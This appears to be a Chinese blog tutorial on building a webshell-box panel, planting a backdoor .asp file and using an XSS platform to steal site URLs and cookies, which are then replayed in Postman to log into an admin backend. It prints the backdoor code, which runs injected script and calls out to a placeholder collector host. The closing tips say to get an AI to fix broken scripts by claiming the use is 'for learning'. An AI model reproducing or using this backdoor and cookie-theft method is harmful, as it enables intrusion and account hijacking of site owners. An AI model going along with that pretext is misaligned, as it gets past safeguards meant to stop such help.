1.webshell箱子和启动的aws 参考这个链接下载 可以正常打开
【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接_webshell箱子管理系统-CSDN博客
正常打开之后是这样
登录之后
这样就没问题了 开始操作
2.在后门代码里面写进箱子的后门 这里我找了很久 因为我要在箱子这个虚拟机里做 所以我选择了.asp的木马
要使用到XSS平台 使用办法可以上网搜 这里放个链接应该够用了
XSS平台-仅用于xss安全测试专用 (xssaq.com)
整合之后如下
<%
Dim code
code = Request.Form("code")
%>
<script>
<%= code %>
</script>
<%
Dim u
u = Request.ServerVariables("HTTP_HOST") & Request.ServerVariables("URL")
Response.Write "<script src='http://你的箱子网址/api.asp?url=" & u & "&pass=你找来的XSS代码'></script>"
%>
3.访问这个木马文件 箱子接收到了
我的木马文件是test.asp 如下
4.这个时候看XSS平台 项目里面是不是有记录了
展开 将网址和cookie分别复制到postman
5.postman发送cookie成功登陆后台
postman的下载在官网
打开之后是这样
直接点击overview旁边的加号
将网址和Cookie写到对应位置
send
查看底下的preview可以看到网页大概的样子 虽然是乱码 但是能看出成功进入后台了
6.总结&注意要点
建议在虚拟机里做 所以如果.php脚本执行不了 那就换.asp 因为这个时候用的是aws启动的;
脚本如果出错 直接去问ai 可以改对 就说自己用于学习就会回答 ;postman注册可能需要科学上网;